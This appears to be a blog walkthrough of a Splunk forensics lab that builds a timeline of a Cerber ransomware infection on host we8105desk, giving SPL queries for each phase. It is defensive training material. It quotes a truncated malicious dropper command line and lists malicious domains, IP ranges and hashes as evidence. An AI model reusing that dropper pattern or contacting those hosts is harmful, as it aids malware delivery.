iT邦幫忙

2022 iThome 鐵人賽

DAY 14
Security

none series, part 14

1-14 Hands-on with Splunk 5 - Timeline 2


Walkthrough

This post continues the timeline from the previous one. Each entry gives the timestamp, what happened, the host or user it concerns, the evidence fields, and the Splunk search that surfaces it.

2016-08-24 16:42:17  USB key inserted
  host: we8105desk
  data="MIRANDA_PRI"  (the device's FriendlyName value written to the registry)

  index="botsv1" sourcetype=winregistry friendlyname

2016-08-24 16:43:12  Word opens the macro document from the USB, which launches the dropper
  host: we8105desk
  user: WAYNECORPINC\bob.smith

  ParentCommandLine
  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n /f "D:\Miranda_Tate_unveiled.dotm"

  CommandLine
  cmd.exe /V /C set "GSI=%APPDATA%%RANDOM%.vbs" && (for %i in...

  MD5 15E52F52ED2B8ED122FAE897119687C4

  The .dotm on D: is the parent; the child cmd.exe writes a randomly named .vbs under %APPDATA%, which is why a keyword search for *.vbs over the Sysmon process events finds this step:

  index="botsv1" sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational" *.vbs

2016-08-24 16:48:12  traffic to solidaritedeproximite.org

2016-08-24 16:48:13  request for /mhtr.jpg from solidaritedeproximite.org

2016-08-24 16:49:24  Suricata: A Network Trojan was detected
  192.168.250.100 > 85.93.0.0
  ETPRO TROJAN Ransomware/Cerber Checkin 2

2016-08-24 16:49:25  Suricata: A Network Trojan was detected
  192.168.250.100 > 85.93.4.54
  ETPRO TROJAN Ransomware/Cerber Checkin Error ICMP Response

2016-08-24 16:49:36  Suricata: A Network Trojan was detected
  192.168.250.100 > 85.93.43.236
  ETPRO TROJAN Ransomware/Cerber Checkin Error ICMP Response

  All three destinations fall in 85.93.0.0/16. Cerber's check-in is sent to a whole address block rather than a single C2 host, and the "Error ICMP Response" alerts are the ICMP errors returned for addresses that did not answer, so a burst of these from one source is itself a strong indicator.

2016-08-24 16:56:47  PDF on the USB opened through Explorer's "Open with" dialog
  host: we8105desk
  user: WAYNECORPINC\bob.smith

  ParentCommandLine
  C:\Windows\Explorer.EXE

  CommandLine
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL D:\Work Stuff\013\013366.pdf

  MD5 DD81D91FF3B0763C392422865C9AC12E

  rundll32 shell32.dll,OpenAs_RunDLL is what Explorer runs when a file has no registered handler: Bob double-clicked a file Windows no longer knew how to open. Listing every process whose command line references the D: drive gives the order in which files on the USB were touched. The search originally used CommandLine="D:\", but a trailing backslash escapes the closing quote in SPL, so the backslash is doubled and wildcards added:

  index=botsv1 host="we8105desk" sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine="*D:\\*"
  | table _time, CommandLine
  | reverse

2016-08-24 17:15:12  cerberhhyed5frqa.xmfir0.win

2016-08-24 17:15:12  Suricata: connection to a Ransomware Cerber domain
  192.168.250.100 > 192.168.250.20
  ETPRO TROJAN Ransomware/Cerber Checkin 2

  192.168.250.20 is an internal host; the registry entry below shows it also serves the file share.

  index="botsv1" "Cerber" sourcetype=suricata signature="ETPRO TROJAN Ransomware*"

2016-08-24 17:15:18  Network share reached
  192.168.250.100 > 192.168.250.20
  registry_path
  HKU\s-1-5-21-67332772-3493699611-3403467266-1109\software\microsoft\windows\currentversion\explorer\mountpoints2\##192.168.250.20#fileshare

  The MountPoints2 key records every UNC share a user's Explorer session has opened, named as ##server#share. This entry under Bob's SID (...-1109) shows \\192.168.250.20\fileshare was reached six seconds after the Cerber check-in alert, so the timeline extends from the workstation onto the file server:

  index=botsv1 host="we8105desk" sourcetype=WinRegistry fileshare
  | head 1
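As an added example (not part of the original post), the separate searches above folded into one search that tags each hit with its phase and lists everything in time order, so the whole chain from USB insertion to the file share reads off a single table. The field names EventCode, src_ip, dest_ip, signature and registry_path are assumed to be the ones the botsv1 add-ons extract, and the phase labels are mine. Suricata events carry the sensor's hostname rather than we8105desk, so that clause is keyed on src_ip instead of host:

```spl
index=botsv1
    ( sourcetype=WinRegistry host=we8105desk (friendlyname OR fileshare) )
    OR ( sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" host=we8105desk EventCode=1
         (CommandLine="*.vbs*" OR CommandLine="*OpenAs_RunDLL*") )
    OR ( sourcetype=suricata src_ip=192.168.250.100 signature="ETPRO TROJAN Ransomware*" )
| eval phase=case(
      lower(sourcetype)=="winregistry" AND match(_raw, "(?i)friendlyname"), "1 USB key inserted",
      lower(sourcetype)=="winregistry" AND match(_raw, "(?i)fileshare"),    "6 network share reached",
      like(CommandLine, "%.vbs%"),          "2 Word macro launches dropper",
      like(CommandLine, "%OpenAs%RunDLL%"), "4 PDF on USB opened via Open With",
      lower(sourcetype)=="suricata",        "3/5 Cerber check-in alert",
      true(),                               "other")
| eval detail=coalesce(CommandLine, signature, registry_path)
| table _time host src_ip dest_ip phase detail
| sort 0 _time
```

lower() is needed because eval's == is case-sensitive while the search-time sourcetype filter is not. Any row that lands in phase "other" matched the search but none of the classification conditions; review those before trusting the timeline. The 16:48 web requests to solidaritedeproximite.org live in a different sourcetype that this search does not cover, so they have to be added as a further OR clause if they are to appear in the same table.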

REF

https://www.aldeid.com/wiki/TryHackMe-BP-Splunk/Ransomware#2_-_What_is_the_name_of_the_USB_key_inserted_by_Bob_Smith?

